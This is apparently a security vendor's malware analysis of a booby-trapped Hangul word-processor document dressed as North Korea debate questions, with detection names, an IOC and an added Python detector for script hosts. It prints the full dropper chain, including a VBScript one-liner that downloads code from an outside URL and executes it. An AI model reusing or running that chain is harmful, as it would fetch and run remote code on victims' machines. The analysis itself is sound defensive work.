Distribution of Hangul Word Processor (HWP) File with Title of North Korea-related Question

Previously, the ASEC analysis team discovered a surge in the distribution of malicious Word files containing North Korea-related materials and shared detailed information about this trend. Today, the ASEC analysis team discovered the distribution of malware disguised as HWP files that contain North Korea-related questions.

Judging by the information within the HWP file, the malware developer must have modified a document of North Korea-related questions that were used on December 15, 2020, during the debate on North Korea. This malicious HWP file contains a ‘link object,’ a technique that was introduced in a previous blog post. Based on the path where the object was inserted (C:\Users\Snow\AppData\Local\Temp), it is assumed that the malicious document was created on a system whose PC name is Snow.

  • Document Title: Questions-December15th.hwp
  • Document Details
Figure 1 – Text within the document file
Figure 2 – Developer username Snow

As shown in Figure 1, the malware was distributed disguised as a document file with questions written by a certain broadcast media outlet, and it contains a malicious object. In the previously discovered file, it was possible to check the included object. This time, however, the attacker set a password and placed an edit restriction on the document, preventing anyone without the password from viewing the properties of the object.

However, one similarity with the previous document is that an object was inserted into the document and linked by a relative path. If the malicious document is not located in the file path ‘C:\User\[Username]\AppData\,’ the internal malicious object cannot be run. Although it was not possible to check the object properties due to the password lock, we believe the malware cannot refer to the location from other paths because it is designated as a relative path.

When the document is run from a file path that matches the condition and the object that wraps the in-file window is clicked, the malicious HWP file runs TroubleShooter.bat in the file path below.

  • Created File

– %TEMP%\TroubleShooter.bat

start /min %temp%\Diagnostics.bat

– %TEMP%\Diagnostics.bat

start wscript //b //e:vbscript %temp%\HncConfig.ini
exit

– %TEMP%\HncConfig.ini

On Error Resume Next:Set x = CreateObject("MSXML2.ServerXMLHTTP.6.0"):x.open "GET", "http://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0", 0:x.Send:rt=x.responseText:Execute(rt)

The file that actually executes the malicious behavior is HncConfig.ini, which attempts to connect to the additional malicious URL. However, the malicious behavior that takes place afterward could not be confirmed because no data can be received from the network at this time.

  • Order of execution: TroubleShooter.bat > Run Diagnostics.bat > Run HncConfig.ini > Connect to malicious URL
  • Malicious URL : hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0
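
The Diagnostics.bat step above runs a file with an .ini extension as script by forcing the engine with //e:vbscript. The following is an added detection example, not part of the original post: it flags process command lines where wscript or cscript is given an explicit engine and a target without a script extension. The function names and the sample command lines are constructed for illustration.

```python
import re

# Extensions that wscript/cscript map to a script engine without //e:.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

HOST_RE = re.compile(r'(?i)\b(?:wscript|cscript)(?:\.exe)?"?\s+(.*)$')
ENGINE_RE = re.compile(r'(?i)^//e:(\w+)$')
TEMP_RE = re.compile(r'(?i)%temp%|\\appdata\\local\\temp\\')


def check_cmdline(cmdline):
    """Return a finding if a script host is forced to run a non-script file."""
    m = HOST_RE.search(cmdline)
    if not m:
        return None
    engine, target = None, None
    for tok in re.findall(r'"[^"]*"|\S+', m.group(1)):
        tok = tok.strip('"')
        e = ENGINE_RE.match(tok)
        if e:
            engine = e.group(1).lower()
        elif not tok.startswith("//") and target is None:
            target = tok  # first non-switch argument is the script path
    if engine is None or target is None:
        return None
    dot = target.rfind(".")
    ext = target[dot:].lower() if dot > target.rfind("\\") else ""
    if ext in SCRIPT_EXTS:
        return None  # explicit engine on a normal script file: not flagged
    return {"engine": engine, "target": target, "ext": ext,
            "in_temp": bool(TEMP_RE.search(target))}


def scan(cmdlines):
    """Apply check_cmdline to each command line and keep the findings."""
    return [f for f in map(check_cmdline, cmdlines) if f]


# Constructed sample process command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'wscript //b //e:vbscript %temp%\HncConfig.ini',
    r'"C:\Windows\System32\wscript.exe" //b //e:vbscript '
    r'C:\Users\user01\AppData\Local\Temp\HncConfig.ini',
    r'cscript //nologo C:\Scripts\inventory.vbs',
    r'wscript //e:jscript C:\Tools\build.js',
    r'notepad.exe C:\Users\user01\Documents\notes.txt',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```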

Various types of document files disguised as North Korea-related materials have been distributed recently. All users, including those working in North Korea-related fields, must therefore take extra caution when handling files to prevent damage from documents disguised as question sheets like the one above.

V3, AhnLab’s anti-malware solution, has implemented detection in its 2021.04.09.04 engine, and the current detection status of other anti-malware providers is as follows:

Figure 3 – Detection status board of VirusTotal

V3 products detect and block the files using the following aliases:

[File Detection]

  • Dropper/HWP.Agent (2021.04.09.04)
  • Trojan/BAT.Runner (2021.04.09.04)
  • Downloader/VBS.Agent (2021.04.09.04)

[IOC]

  • hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0